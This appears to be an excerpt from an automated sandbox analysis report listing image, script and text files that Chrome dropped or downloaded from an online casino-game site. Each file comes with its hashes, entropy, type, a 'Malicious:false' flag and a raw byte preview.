                                                      Preview:.PNG........IHDR.......4.....|@_.....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164460, 2020/05/12-16:04:17 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:1d500673-6d2f-7948-81b9-0c3864da77c0" xmpMM:DocumentID="xmp.did:1DC83302EFFB11EE8559FFB05D7D1380" xmpMM:InstanceID="xmp.iid:1DC83301EFFB11EE8559FFB05D7D1380" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:96146813-4c25-e644-9939-6d74e35551e8" stRef:documentID="adobe:docid:photoshop:794b9680-2339-0143-8672-e68610aa39a0"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Js.....XIDATx..].p....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 15 x 16, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):582
                                                      Entropy (8bit):7.383404335375549
                                                      Encrypted:false
                                                      SSDEEP:12:6v/7rOaiVFgiyBtzWcMEnDCcKg3mmCb24KBG5Dd+UcgrFnEt8Qf2aqc:QO4VBtzaEDSmc242G5Dd+Uz04a9
                                                      MD5:D66100DC3B6143CCAAB68587EDF59169
                                                      SHA1:AEC841ED002D6F0572B1BC380212D38BE5858728
                                                      SHA-256:CBA9DFE544DF0C8B71BB9881E1D77B9BE08007DF320ACFB8398C9B636BC1AFC5
                                                      SHA-512:A5DB92A6BB8E2BED2268BA81EBCFBFF6564EE50D09ED94C2302CBAFB4E234CF9ACC99D585568ADB0DE318E38E790467CF81FCB05643338C7200277A878D04D73
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR................6...DPLTE...@*.M;.oc3fT"]>.gD..j......................................H.#9........Q3.:..............................................................................................vx............~..x..l.zk.ae..^.hWW\V.uU.fTx_KDeJKaJ..H}fFgM<=/<.!.\D,.+..&V2....G/.>%.<".... ........&(..].pT..../../..... ....P.....tRNS.........&.....IDAT..E....Q...G..d.m...}.:....JE.._g....Y.+..W.Z...o.sy:>|.#.....D(.i.o[.D.?N.c.:..".[M..."C1.......).PV....w...5.eY..H...#.4o.I].>.)8..X..d!m.q... ...hO.J.,...7.J1.~.....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):27587
                                                      Entropy (8bit):7.97752720518919
                                                      Encrypted:false
                                                      SSDEEP:768:AwgojXWrT3UzlRgdyLFa39MHmp6y1tGR9p:8YXW3Y1B7HmQytIT
                                                      MD5:13B792E637EC5F58E79F69D5E4DAABD2
                                                      SHA1:5A4B18235F2DB8B489F21C7E25134C5437973CD6
                                                      SHA-256:06B87CA0BD4B1DD3819CFA00241D70596C08DC21F256EDDC1EA4D53B194698B0
                                                      SHA-512:1142DF996DEA3A9DE9B35CEE7ECF0A88D4CF8F973E112363DC4B1C6D6F73E4F9CF5801BDF00F82176155775A52676AE47C859E99D8D3ACFAB61AD21F66F4892A
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/joker/zcw3utgfzk75o.png?ver=1718611710
                                                      Preview:.PNG........IHDR...............^.....sRGB.........PLTE]A1lI3c9%X/...&....#..... ....u..g..[..N.t9.f3.V'.M..d".t)..7..@..K..T..v..../.3..5..3..;..G..W..g..r..q..Y..J..E.@.;.5.{1.i,.^(.z7.I.N.U..e.q.d.zU.\H.?8.71.++.T@.............z..m..^.uT.kM.YA.M:.eKsV>.dQ.r\.}d..q.xl..{.....................................................................|zrkmgbi]UaSIXLCPC>E;8N=0D6->/'7("0#.'....,f.A..Aj.r.....[{.*LL.2..#.-I%>[4Sp................................w..ms.bgyW\lMP^DGS>?J57A107(+2!"(........."..C...{..b.................! .$&.12.67.=B.VA..P.....w..p..Y.f.zG...d..s...................................w.r.`.vL.l<.a9.U,.M&.C.r;$|N&lD..h,.}(..9.1..Q..H..]..I..;..2.. ....................9..G..V..i.........#!z..e..W..I".<../..)....................!..'.....7".?'.J/ T8'..hQ..hqIDATx.T.g.U........T......J.DMr...zR._4...@..0..P..h.1jN..$...QsrRL.`W...:}.....I...f..k....g...!]Z.....q..F.r..s5.f.72..}.~}F.[+..:.p.~O..u.j..d<..v.Pz"!xr......
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 204 x 101, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):7106
                                                      Entropy (8bit):7.960567472534941
                                                      Encrypted:false
                                                      SSDEEP:192:Jn8y/DYQmDsK7rpKUrFpCRmd4xV8nQUlL0yqADW2lR7:V8MEQtarYGwo4xuQGPlR7
                                                      MD5:E63C7AE6E7F2672F20E5DBC407D241F3
                                                      SHA1:B0234B61001B255A7B5F877FB1F2B7C53E732837
                                                      SHA-256:576B1EB003A9C1BE98CBDB10694F4073422B92A685305FE46C5274F70E78ECCC
                                                      SHA-512:634C36DDDB0236D15A612C4905CC86972C5D80018124669F01902E5B3993696B90FD3F2409B01DAA4654098260A3B8F675495BE5BAF024A7E7A0D1EF68854AF1
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/other/en/p-img1.png
                                                      Preview:.PNG........IHDR.......e.....6.......gAMA......a.....sRGB.........PLTE...###&&&$$$!!!"""%%%... ............'''(((.........))).....................***|||111ddd............{{{...........~~~...xxxFFF......qqq.........}{|777+++.........". eeeTTT......VVVggg.........aaa.........}}}~|}...!. ... ..bbb%#$.....fffhhh............kkk...555...EEE...ppp...{yz|z{...ttt...YYY...WWW,,,...HHH...NMN...............ooonnn.........///zzzgefQQQ.....CCC..................:99jjjsssUUUBBB444.........333...............:67......vvvrrr...ccc.....666www^]]\[[...RPQ......XXX```___...-,-???......SSS...<<<JJJ.}~=:;?==PPP...AAA...KKK$&%...LKL...# !....~.zxyyyyiii..............................fdeLJK$"#......&('OOO......%'&845...~z{spqC@A...igh'%&...WTU...!#"')(....{|qop.|}egf|xy"$#........tRNS.@..f....IDATx.....G..g....{fvvW..9........!.B.!.h2. .....$...80..Gp6...g...\.......;^.lP..>....a...M....W.=;..............H.m.}=..."W........l.sC..E.3n..8....3.o..24.23.....7........\wH`......y.#L.N4MC..%.MtAu9.....9.b.-
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):30373
                                                      Entropy (8bit):7.991821443507693
                                                      Encrypted:true
                                                      SSDEEP:768:GS7/BeHThiLRn7oTMInpZBtMbKegBFk0j+iMCwiplUCN/X:G0/fd7yM+BtM2HdynB0/X
                                                      MD5:69B3E817B0DCA4A66857567A297D84DE
                                                      SHA1:40E6C8865C2599B6AA8DDE8F6B2D97010A0BA479
                                                      SHA-256:423A8E906B85E3DD39044EADAC0673B43CC90DC31070891FABCF8CDCE09AB88F
                                                      SHA-512:184364C121761D3EAE885C36AFEE738EE9FFC0FD67160DE27B8DEAA95F3913D2E3B43D9F1144B23333A572C911082A5C4060A459AC7A5B78EF25E39753CDB1E4
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....PLTE+...K....~I.$...O..Q.2".y?.vG..K.H-.n@..Z..K..P..B...).B..].u2.....W.<'....R1..x..O..P..S..m......0.[.....h..Z.q....&.l.....g...<.d....M ..?.\6..|.i*..x...6..'f7..C..!.. ....c.Z-..%..........6.L...$...........R.-.. .g.>.........?=.......Y....].....|.......<..p......A..........$.3..{..MLp...I..q .T..j......*...j!;_...1...R7..m...7....g...........$./-.!.......&....^..rA..H.gH.]..Y!j=...._?......2?'.......v,E..Z0.-1..J..t%$h-#.m!.......e.I-.......`^k...j4.5'...1..^.....u6.:.....B.| Z...w........S.aH.H4.4-.1-.}I....Y.B:....M.+(..s@6.^..#..@Y&.qV..-(.......\...X-D...K....,"..Q.-.82:.W/.oH.|..z..N..9.f>.MJ~*/.i....5E..3.M..@.....LKK.D>..d..2..,.....WD.C......e...Z|yz.....o.vt....k[.|c`_........hpf7WS+...%...Ik.pR.....4...|.w..._...6..c....s`IDATx..Q..p......."".u=t.VD'.QR'..KE..]ET..........M*..$<.5.C.e..u..S.aA.${..z.....w^....t.......o..q.^..'c...F.UK.:.....h...,..4i@R8NQ.I.FJQ...@N......d..D&C......@&..l....p
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):5398
                                                      Entropy (8bit):7.877581383518887
                                                      Encrypted:false
                                                      SSDEEP:96:dTaIJLunahJSJE2621TvUmLVSYqO5K3QKNILxCwedHXGfQFIGm25MnVJD:deAzB121fLEYqZexCwe5bFIGfCVJD
                                                      MD5:FE71F96E24F6762C5213F4464104E173
                                                      SHA1:6A84E92D7C873B41FCFA36A3859DA4E405151868
                                                      SHA-256:07A9D180EFF08B6FD647C7E49AF3D755C0435092D035B2FDC97049848F904B67
                                                      SHA-512:966D545EFFC423171752FE29293D5899B70CD144CCC557B40DC3CC577AF230B3F846B9DE3A2F833240EF6E76BDB1CD6518CE78F652B76FC8DB8BF07AB2644504
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR..............P......gAMA......a.....sRGB.........PLTE............pp..FL.m-.b6...\\.............''y....m-..pYY.......................[;1"i...>>........m-.m-..o.m-..p..n.m-...............))z.m-8$g..., j......##v.......m-&.l.m-.m-.m-.m-.........22.::.....m-.m-.MF.m-).k.m- .n.m-ee.EE....QQ...................R-_.TAD(c..p#.m.m-.i0.i0L+a.m-..o...............UU........II.....m-....m-.m-.m-.>R.m-.m-....m-.m-.m-.m-.m-.m-.m-.h1.m-....77...........^8u:U.m-L+a.m-.@P.m-.CO.m-.m-.e3.m-.m-_2[.m-.d4...o8W.............NN.......//}.........tt...........m-.m-X0].m-.NE.m-aa..JH.m-.m-.j/w;T.m-.GJ.m-....m-.......mm..m-=&e.m-.m-......h5Y.W>.m-.m-....m-...U@Z0].f2...66.bb..c4d4Z.m-........FKuu..]:.`7.m-.QC.DMnn.AA..Y<...yy.]]....~~.LL.qq....22.FF..m-.......||..m-.OD}}.yy............p.m-...&&x.m-..r.k...q..s....l...p!!u.j/J!WQ....tRNS......@...............................................z.G-........`....................................X..=..i..:.u..!...............P...........
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):9651
                                                      Entropy (8bit):7.944941508965117
                                                      Encrypted:false
                                                      SSDEEP:192:JOaTYbKJvJXpid/9TDsH2YfUwmf0xaX7yNShcMRS3t/PQfqMGUU:oGJvKd1fy2YcNf0xaXOWcBPQyPR
                                                      MD5:46E1092035A93812DD68086C33363DAE
                                                      SHA1:8EF09D3FE3691BE69756E8DD8132768D72467E53
                                                      SHA-256:0FA3D59BA584A9B691973545A62F991523E46329B15BA3A561744168A827EC11
                                                      SHA-512:B427DE08479E00FCC7D4DF0529403BD8488777D70B35E7DCE6B415AB2028A447A15B80209118FAC8B4E2A418BA3719DB2879F32CB1EA935FFCDD84285795A1C8
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/egame/nav/197_egame_logo.png?ver=1673578619
                                                      Preview:.PNG........IHDR..............P......PLTE........e{.............yx...xZ.{r....m_....!o.+mt....I.6m...\?x..f..m.cv....nWB....l..H?.....rF.'n.Gn..~F....|....J5...j|.]wO...\^..N.@o. n..D..\\..h....A..IJ..N..)m|.^.../..F..c...p..=...[\...?....R..[E....I.Hc/....O.Dg,...t...NP..D...cx>...Zr<..3s..M..H.....VF...Sh.....D!..)....Gx_p$..6...D..M..K1..._e..M.?nP....LL...ZgK...cd(..U...Cl..B#....C..EE...yE1....A..A-...t.gc..L..D..@..K ....?..C..u..E.sD.t.0....u..s..D0...@...1....sB..2..2....r:....u2..>..6....@I....@..C3......l.0....r..L2....@F..3...t1.......E...2..3..6..3....L..t..N..L..G1....k..M2....L.lD/.......q..F.kT0......|..(t.na1...... u.Hi..m:...!u.`V..r.-t..N..p..s.$r.P^.W[..q..q@...q-...|...N....0s.rJ.6r.nE.u..jb.~Q..p!....o..O.uS.<n..O..C.2n/...m|7V{.Qh..s.Lb"..&....sw,u...k:.....htRNS......7% 1LS..Q..$..U.^.ygc.....F..qn?0...zP.....d..rm.xr@8.....]......7........M....j..r[....!.IDATx.......................c..0...v..,C.4"..fa....a@XX...E.)...F..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):24489
                                                      Entropy (8bit):7.977717516500666
                                                      Encrypted:false
                                                      SSDEEP:384:6+LRQcn3nfkoMtzocf5zB0pxdGdXE9d84G2UWFb9o9FuUjzjDTe7kZTpH8cRpPQP:6+Qc3nfkoKzFf5iGGHFo9FuAOIZTpH8P
                                                      MD5:06411062B1CDE94DE34BE7137659883B
                                                      SHA1:BD4D3FACD904BED02641A1E0EA77881C949814EA
                                                      SHA-256:CFB7AD9F7DECAE053B9C18CB238D16F783611BFDB1FF93F91682D851E4A490A4
                                                      SHA-512:691710DA22AAE8EE6E14CAC6EB993148308B4FB8AA7B27D6DBFC2BFA6F85F8AD35DE68993B7F1DB97F0A14B7FD9FF430458F35249A3F9E14D82DCAC8588EB5B2
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/yoplay/YP801.png?ver=1664356226
                                                      Preview:.PNG........IHDR...............^.....PLTE.....9..........>...5.........!.... ..:....$#.9.(&!.#;......<%%F32I5.B*)"**..J..J.....0.0A.*>//''......10#.5 ..H!..H:;4,....WS.&13.7=..3...L>.P74...A,....@\.'%.:4..I.YIFU>;..-.#0..2...UY,_PNPE...58:-....i#..2.u-NCB..y..I=-/.v,K-'....N.....oS8....,Q...|.....&.b!....A..0.{h...lYR..O.l*.C.D>.8\&.#..4..<.,4.urDK(..gF;.;.p&gT....ob_..d.G.4.6F/;<....|w.=A"5.......b.A..........yylk.^...x.G.*E....W......}g^q.B.[..e'@E;De0.-......|.0:..30..._+....`_1Ls:.l...xp.oc^F....\7(.bA..?de..R,...7.}K.....[wK.q=.g..I..*u^......v.j^.8..Y.m5...nk8.i..ej~XXr+adC...W]ZpD&4E....gS.sNRKwpI{4....elb.S.O]...TFlz ..~....H ...\+..Z...Q.D....}...Z;KN.vJ.r=.CM{.&....p&AI.9.EHK..ltp.YY.5@-U`..^.."..=...........y..i....53.?W.Y..Z.n}#..8L...k|.cf....Ui.R.....\dIDATx...kZg..p5...O.C.g9..1.t)(F..7.....7.."8+...X....3.\T......^6.%.2$^..?0:rQ.E!._..}..l..=._.[.'...'T'.z5...<..9.E@.~Zf....H.hifffi.l6..V#.U..GI....e2.j..l8}tt....i.....$.!H
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):21325
                                                      Entropy (8bit):7.978796973733474
                                                      Encrypted:false
                                                      SSDEEP:384:x9tXpi1a/Q3k+YTwkJyqREQwDSyF9RuzWLbNxCvPY6qhOGxisBszFc:x9hUA/2ZBkMVQwD1F2gqPYnVxisBszW
                                                      MD5:7F7F58A3BE003C5DBD0FF0C3AA1FBCD0
                                                      SHA1:E153296CA45C0D82DD82BECE52BBF1DEEBDF0D22
                                                      SHA-256:A9A3A7A52B3CAE8DB5EE87726A3050DA233DF380C6C26B37052B0BEFEBAD15D0
                                                      SHA-512:5CD9CA615212270005D9ABF736F781E7990E32CC6A1F6CE3CECA68BAF8F17E66F8CFC3FBCA74E27962FCA8D3915A45497562F884BE9FF83A577637CEDB7D0A87
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....gAMA......a.....sRGB.........PLTEZ!.U...B..K..d....^.........]..T..0..p.>............L..v..k...r...8................T.........#.|...{..1.J.....>.......".....# !h..!...=.t.........&....*.Z..w.........~...J.......#..j...............i.......!.SD.D....;..G9.................0.....!.".1........s...............&...j..Q....k<.......M2..2-0.6..:..`.]..[8..1..q..-.^......5....-..A.....Y.!.....e..pH.!..gI..X..5..z.+!.....G..i...".......X..F..g...xZ.D'.rO?=B...}.mB.~......zZ...b?.$..g...@....k^...]%..v!.y.....~........a.Ay3..Z<.O..w(.z!...MLT.....i..e`l.M..9(H...m.._c..3....I.S..&,../...H5..j.e .H..]$......yz..H.I..L4...5..5.. ...n5.R......O&.b..\.B....{)Q.gN.U>/oRE{8-.2..cA.pN.w.zO..F:,o.l\.X......c...>O.......R.....u...j........J>.~....\.0....a........r..f.X.c.. .IDATx...\.W...B......+.U..C...2.!..........\...e....U..RDQ@D+j.....ZG.Xo..jk.v.....}.s.7!*b;.....a{I.9..Y.s..x....f.?%..8>..?.....B....}...?...= .<.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (32074)
                                                      Category:dropped
                                                      Size (bytes):253669
                                                      Entropy (8bit):5.142891188767758
                                                      Encrypted:false
                                                      SSDEEP:3072:FkHOJD1g7SV7opRBbDrtnAcKYvFJi/5PLO1aG0qF2/nwOW16j:q9/KvjOVlFYQ16j
                                                      MD5:C15B1008DEC3C8967EA657A7BB4BAAEC
                                                      SHA1:78489E580ADAEF931E6E5B131DAB556C397E4A1A
                                                      SHA-256:28CE75D953678C4942DF47A11707A15E3C756021CF89090E3E6AA7AD6B6971C3
                                                      SHA-512:BADA3D9A5433AECE7D57020B70B89161E2CA3CF6D2FDB4FBD5D6BF38405813071D35493C8D8232F83D7BE91628A29D436BE7FD9AF918AE68F93022D9584B50B8
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:/*! jQuery UI - v1.12.1 - 2016-09-14.* http://jqueryui.com.* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effect-explode.js, effects/effect-fade.js, effects/effect-fold.js, effects/effect-highlight.js, effects/effect-puff.js, effects/effect-pulsate.js, effects/effect-scale.js, effects/effect-shake.js, effects/effect-size.js, effects/effect-slide.js, effects/effect-transfer.js, focusable.js, form-reset-mixin.js, jquery-1-7.js, keycode.js, labels.js, scroll-parent.js, tabbable.js, unique-id.js, widgets/accordion.js, widgets/autocomplete.js, widgets/button.js, widgets/checkboxradio.js, widgets/controlgroup.js, widgets/datepicker.js, widgets/dialog.js, widgets/draggable.js, widgets/droppable.js, widgets/menu.js, widgets/mouse.js, widgets/progressbar.js, widgets/resizable.js, widgets/selectable.js, widgets/selectmenu.js, widgets/slider.js, widgets/sortabl
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 700 x 255, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):74996
                                                      Entropy (8bit):7.975613848746688
                                                      Encrypted:false
                                                      SSDEEP:1536:3AFX09Ube/vaJq9ouxBgbHK9buSiHTGhVeULLs2gX:QK9Usio9o2P9IHixEX
                                                      MD5:2928F4758954C352F4399AE51910AAE4
                                                      SHA1:54BD713892830CFFA4F2ABC335C7C6425946C843
                                                      SHA-256:BC1789B0C98D45AFAFE4DE82829720F6A6681334635D0B6027059C8F178F2ACD
                                                      SHA-512:DD1C907A3139FF022E308A654F5FE91EBCD0EDCCA12F6814BED6DEC7650792CCB6843EC6E7B26EC262C6031263C467AFA82E3F295DB6B83AB9A2B14A6D4838DC
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/cms/cms_1046.png?ver=1611751393
                                                      Preview:.PNG........IHDR.............$7......PLTE.....................$..)......../..5..C....v<..g.....g..$..P..W.....,..I..o.....<..^.....j..q..7..`..x.....U..s..4..!..@..J..{"..........'&......&$(..H!.z..0$.7+90#1..#.!.)&.!.>1B......`............72.&#..~...d,$.0+. .U1(..(..+R#..,+.:);#.*.)\;5;/.5-,7*.G;>.qC(..q."['.E9MMAXRGcH+%G8.kD6|.'.5+..g=%.%..Y;NB/B40s9/.:4QCG}I4.71.F=[N7|WDH..V>.cAE.2...R[MR.NCA5......nP@.A8...C:..z.F5^Sp.cWP+..s|vch[y.L).jfZC.PN..t..L....\.cO...2....pSQ{\\.]:.,..SK.tinb.vFE....Y;]Oe.@!.M+. ....jY....cZ.....wic\....vf....r.XJ.+..{.hl.YD...........).xx.^...iI....4)~E"pZ#.dX.vJ...vb..V.sRwhD.J7.sd..~....bJ.^f-..........93...F(.<.ulr.R..uG.....v].e5.($.l.J._M...b...b.o7zm..n.d5.u..`.....L:3.#..?.Z&...n......l.O.].....|H.....w...(..\....D.........o|....!.IDATx...O#U....c...C.-....$@Y...J..@..].@..."-Eh.D.c...Dn...M.w.c.!^...Wz.1&....>.y...l......ygZ.!..O.s....U.|..u.....!...D<>1TWWw........p8..r.............y({.........f.Aah.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):29124
                                                      Entropy (8bit):7.985608288203439
                                                      Encrypted:false
                                                      SSDEEP:768:lSrHchIS58l+r5CJJr/OiIeu+HyZw7Xm+GSHg1L:l+kIsQu47mdMHZOdR
                                                      MD5:FE282597F7E9143C4DD411A483AC1F02
                                                      SHA1:425322F3D92632BDD0B52E729C1E4085770A7EE1
                                                      SHA-256:E84858C9F48BB7B4717B471CDE44B982E13BAD02C7C8CFBEAB185476864A351E
                                                      SHA-512:956B34A1B217F013DE76286FE419AF1FA5200DBF1FD733D1567DF60590016462ADC63531276F0AB7E535D4EA50351CFDAB30B31C24F8BAE7B9DB63FF4D0E8E85
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/joker/ue8mt39rhzpps.png?ver=1673334591
                                                      Preview:.PNG........IHDR...............^.....PLTE... ....... ......V00$..=..P*.+..+..".%Y680$%".....G$%_>>...8.....:($L;3q23Q...-+......SF;&%-I.....N/#.....)\JH3#....}f`.....pV......ebip\U>58Z"!..,..^4,0Z8...Fb:,.p.fV. /r(%kK...R4....d,...{iRGyX$e%$.32.UGiG4r:.F.,B*..VSe;.N$..zaTU^..m>4*LGQ=.....wuFA..0DC@.1<Gh..n..PtKM0..:....aH.M<..).ulyB*..3.%.k..B....X..Z......Ca35F.*:*.7.W...`WR..>.g).}$gkR^p..Mr.L.!s...|.5.....?.Y.7BT..%&/E..0.]Z....d.......3.qf.}<.:7..K...."f.Rar....#../]y.....t|_.8O(....pXZB...lS..T.S:upx.u!....G.k0.7|..u.ri.]......M..=......K.h.Y...7...Y.R.DP{.{TI4D)...~/,6]./.....7|"...K..h..m.N.......e.B~g@.@A...b.....7.&i..C..hC.S.vz..t....a....)d..W..`..... N@k..IA.b..~....2...~...K..xTx.O\..e......$M...-.........o.........0....]..?b..O.....o.....I(...n.IDATx.t.]h#U..g&3..d.I.|hk$%..6.I...$.c..mS.@lZR.EK]w.\.%P...4.,."K../..E.Z.E|..]......Z_DA...w&........=...9s)..p........J.6.^k*.'...:.O....@jc((..'.HF.f...&l..=v~.......%.I..t..D
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit/color RGBA, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):85137
                                                      Entropy (8bit):7.993023816304857
                                                      Encrypted:true
                                                      SSDEEP:1536:+r4JP1Tt1O64ZDp5HOV336JKxfMVMxU+mR2h5CvrlHRYUi12ymXGokgOdj:zZ/P4/5HOB3QgUVgMU48IW5gOdj
                                                      MD5:0D121559A69FB80F84F57FE179998BB8
                                                      SHA1:D7BF173540950E314EA58853DA086220E1BB0B53
                                                      SHA-256:47E84B2F858B5483A1767F18A6CBD8649D6D61ABE9022F835AC2F56E196A820C
                                                      SHA-512:19FC334E2D8666C218485B7AC4EE63F2481E4F1FF4A34151A8418B1AB7FEC36C0D2FCFFA2458B95890E0828BAFE158381FC3DE1B6EED1D3CED1954C899D953B2
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR..............X......zTXtRaw profile type iptc..x.UPK..!..{.9B.....9Au.......(.F0..>.p.....y....^QJHEXL...YEc%..O.C..@..Jg$hV.!kL..]Z`*.H*.a..1.f.*....o.>..........L....rR......xO..&...../#...._..G.5.L.....iTXtXML:com.adobe.xmp.....<?xpacket begin='.' id='W5M0MpCehiHzreSzNTczkc9d'?>.<x:xmpmeta xmlns:x='adobe:ns:meta/' x:xmptk='Image::ExifTool 11.70'>.<rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:dc='http://purl.org/dc/elements/1.1/'>. <dc:subject>. <rdf:Bag>. <rdf:li>Icon</rdf:li>. <rdf:li> mgp</rdf:li>. <rdf:li> upg</rdf:li>. <rdf:li> Architecture</rdf:li>. <rdf:li> Building</rdf:li>. <rdf:li> Column</rdf:li>. <rdf:li> Emblem</rdf:li>. <rdf:li> Pillar</rdf:li>. <rdf:li> Symbol</rdf:li>. <rdf:li> Tiki</rdf:li>. <rdf:li> Totem</rdf:li>. </rdf:Bag>. </dc:subject>. </rdf:Description>.</rdf:RDF>.</x:xmpmeta>.<?xpacket end='r'?>..... .IDATx.....eUy..]k.S...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 270x234, components 3
                                                      Category:downloaded
                                                      Size (bytes):4267
                                                      Entropy (8bit):7.487674706942627
                                                      Encrypted:false
                                                      SSDEEP:96:rQUNe3tjQTuG9jZIBSN2l7IUUOzQVUAQjPkG:rxNZuG9MS8l7oOkVUAG
                                                      MD5:FEE5097BC88F140446C66C0F02F4AE1A
                                                      SHA1:39E1A7314D93A6E3AFEE86A58A5B67A3943C8723
                                                      SHA-256:7068EE30D85BE9813BF2277CEFF755A0C2ABEEF74CD5000BEAA910C7DC3DFAB8
                                                      SHA-512:E9536DA98F5BDD479946B6B68B5C51DA09819FA95DD0739FF733892615E4E39584D4D6236C46A4AA9AB77CECED83F925C0FDFF985480643884D74B8F799B2378
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/index/panel_b_bg.jpg
                                                      Preview:......Exif..II*.................Ducky.......P.....ohttp://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:BB818149EA25E311A32FDF049616BCF5" xmpMM:DocumentID="xmp.did:0F0B918325EB11E38934F11AFF6C508F" xmpMM:InstanceID="xmp.iid:0F0B918225EB11E38934F11AFF6C508F" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:BB818149EA25E311A32FDF049616BCF5" stRef:documentID="xmp.did:BB818149EA25E311A32FDF049616BCF5"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............................................................
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text
                                                      Category:downloaded
                                                      Size (bytes):4386
                                                      Entropy (8bit):5.56314218762628
                                                      Encrypted:false
                                                      SSDEEP:96:veR5suijTWxKhgCBTSCkAjnhefPMm03OMu9eqeeV0vMu9eqeeVqgYi:veR5su+TWsU1eO70v76i
                                                      MD5:4E7441DC033395B76A96B25B6EFEF0F0
                                                      SHA1:C833E33F4A95EFA559A847DFFF036CB904260B48
                                                      SHA-256:80CAABBE50F5F83254E2545D01BACF299C7F417A103E912BD41D6C330A6E4F86
                                                      SHA-512:E96041AC2B7106FE9ACEDDC1FAA3E996FFAA97945D56CFF7B3CA0697492CF6FF53F6FC3826319A85EB360E684A166C0C8C075118A37655312DFBF231FF9AA167
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/assets/js/caller.js?ver=1675418257
